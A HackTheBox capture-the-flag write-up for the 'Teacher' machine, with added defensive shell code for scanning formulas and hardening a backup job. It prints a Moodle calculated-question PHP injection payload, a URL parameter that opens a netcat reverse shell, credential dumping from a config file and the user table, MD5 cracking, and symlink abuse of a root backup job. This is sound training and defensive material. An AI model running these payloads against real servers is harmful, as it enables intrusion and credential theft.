HTB Writeups: Teacher

Teacher

Teacher is my 30th machine on HackTheBox. User access is gained by finding partial credentials, fuzzing the missing character of the password and then exploiting a hole in the Moodle software to get code execution and a reverse shell. This initial access is escalated from www-data to a useful user account using SQL database credentials found in a config file. Access to the root flag is then gained through a symbolic link, made possible by a backup job that modifies the access rights of a folder.

User Access

I started, as I always do, with the nmapAutomator script that the wonderful 21yfd made available on GitHub and shared in the HTB forums. It's a great timesaving tool and gives you a good start on your scans.

Nmap tells us that port 80 is open, as well as a few other ports being filtered.

[screenshot: nmap output]

Gobuster returns some pages and folders that are worth looking into.

[screenshot: gobuster output]

None of the folders returned anything obviously useful at first glance, so attempts were made on the Moodle login. A few default user/password combinations found online were tried with no luck. As can be seen above, the phpmyadmin page returned a forbidden code.

Even searching using the “big.txt” dirb wordlist and including .aspx and .txt file types did not return anything additional.

Looking at the "teachers" page on the website seems sensible at this point, to see whether it contains any information we could use to log in. This page actually takes us to the gallery. None of the pictures do anything when clicked on, but one of the images is not displaying properly. Moving to the "images" page (10.10.10.153/images) allows us to check each of the images in turn and, sure enough, 5.png returns an error.

[screenshot: error returned by 5.png]

After some investigation, it became clear that this file was actually a text file, and opening it in a text editor revealed its contents.

[screenshot: contents of 5.png opened as text]

We now have a potential username and all but one character of a password. We can use Crunch to generate every candidate for the missing character and Wfuzz to try each one against the login.

[screenshot: crunch and wfuzz output]

We can now see that the password is "Th4C00lTheacha#" and with this we can access Moodle. With a little searching around for an exploit, the Evil Teacher exploit can be found (https://blog.ripstech.com/2018/moodle-remote-code-execution/), which allows an authenticated user to execute arbitrary code.

From the Dashboard, clicking on Past under Courses Overview allows us to access the Algebra course. Clicking on the Settings icon at the top right and then "More" brings us to the full settings page, where we go to Questions, Create a New Question, Calculated, Add.

Make sure all of the required fields are filled in; the answer formula should be:

1?><?=log(1){a.`$_GET[0]`.({x})}?>

The answer mark should be 100%. After this, click Save Changes, then on the next page click Next Page, and you reach the Algebra page shown below.

[screenshot: Algebra question page]

Now, set up a netcat listener on your machine (e.g. nc -nlvp 4444). On this Algebra page, add:

&0=(date;nc -e /bin/bash <your IP> <port>)

to the end of the URL and you should get a connection. After this, we can use Python to spawn a nicer shell with the command:

python -c 'import pty;pty.spawn("/bin/bash")'

[screenshot: pty shell]
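As an added defensive check, not part of the original writeup: a small shell scan that flags calculated-question answer formulas containing anything outside the characters a legitimate Moodle formula needs, which catches the injected formula above. The sample formulas are constructed; a real run would feed it the answer formulas exported from the Moodle database, one per line.

```shell
# Constructed sample dump of calculated-question answer formulas, one per line.
# The third line is the injected formula from the writeup above.
SAMPLE_FORMULAS='{a}*{b}+sqrt({c})
round({x}/2,1)
1?><?=log(1){a.`$_GET[0]`.({x})}?>
pi()*{r}^2'

# Return 0 (suspicious) when the formula contains anything outside the
# allowlist: digits, function names, {placeholders}, arithmetic operators,
# commas, dots and spaces. PHP tags, backticks, $ and [ all fall outside it.
formula_is_suspicious() {
    formula=$1
    if printf '%s\n' "$formula" | grep -Eq '^[0-9A-Za-z_{}(),.+*/^ -]*$'; then
        return 1
    fi
    return 0
}

# Read formulas from stdin, print each suspicious one with its line number,
# and print the total count of suspicious formulas as the last line.
scan_formulas() {
    n=0
    count=0
    while IFS= read -r line; do
        n=$((n + 1))
        if formula_is_suspicious "$line"; then
            printf 'line %d: %s\n' "$n" "$line"
            count=$((count + 1))
        fi
    done
    echo "$count"
}

# Usage: printf '%s\n' "$SAMPLE_FORMULAS" | scan_formulas
```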

We are now connected as the user www-data. After a little looking around the folders we have access to, we can find the Moodle config file in /var/www/html/moodle. This gives us database credentials!

[screenshot: Moodle config.php with database credentials]

We can then use these to log in to the database.

[screenshot: mysql connection]

From here, we can list the databases stored here, the most obvious of which to check is "moodle", and then the tables in that database. The most interesting of these for us is likely to be "mdl_user".

[screenshot: tables in the moodle database]

We can extract the usernames and password hashes from mdl_user with a SELECT statement.

[screenshot: usernames and password hashes from mdl_user]

The backup Giovanni user's password looks to be an unsalted MD5 hash, so we can look it up easily on a website such as https://www.md5online.org/md5-decrypt.html, which returns the password "expelled". With this we can switch user to giovanni and access the user.txt file.

[screenshot: user.txt]

Privilege Escalation

The easiest place to look next is the "work" folder in giovanni's home directory.

[screenshot: giovanni's home directory]

In here is an archive, "backup_courses.tar.gz", and nothing else of much use. Enumerating the machine further, however, reveals that there is a backup job running as root. The backup.sh file it runs is found in /usr/bin.

[screenshot: backup.sh in /usr/bin]

Looking into this file, we can see that it creates a backup of the "courses" folder and then recursively gives write access to all users.

[screenshot: contents of backup.sh]

From here, we can create a symbolic link to the root folder inside the folder the job works on, so that the recursive permission change reaches /root, using:

ln -s /root tmp

Then we just have to wait for the backup job to run again (my first attempt to access it, shown below, failed because I was impatient), after which we can access /root and read root.txt.

[screenshot: root.txt]
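Added example, not the box's own script: a hardened version of a backup job like backup.sh, written for this writeup. It assumes the same layout (a courses directory inside a work directory, with the archive written to a tmp subdirectory), refuses to run when a symlink is present anywhere in that tree, and never hands out world-writable permissions.

```shell
# Hardened backup job. Argument: the work directory (e.g. /home/giovanni/work).
# Returns 0 on success, 1 if a symlink is found, 2 if the source is missing.
safe_backup() {
    work=$1
    src="$work/courses"
    out="$work/tmp"

    [ -d "$src" ] || { echo "missing source: $src" >&2; return 2; }

    # A symlink anywhere under the source or output tree could redirect a
    # root-run job elsewhere on the filesystem (the trick used above), so
    # refuse to proceed rather than follow it.
    if [ -n "$(find "$src" "$out" -type l 2>/dev/null)" ]; then
        echo "refusing: symlink found under $work" >&2
        return 1
    fi

    mkdir -p "$out"
    # Subshell so the restrictive umask does not leak into the caller; the
    # archive is readable by the job owner only. tar is run without -h, so
    # any link that appears after the check is stored as a link, not followed.
    ( umask 077 && tar -czf "$out/backup_courses.tar.gz" -C "$work" courses )

    # Fixed, owner-centric permissions on the output directory instead of a
    # recursive chmod 777.
    chmod 750 "$out"
    return 0
}
```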
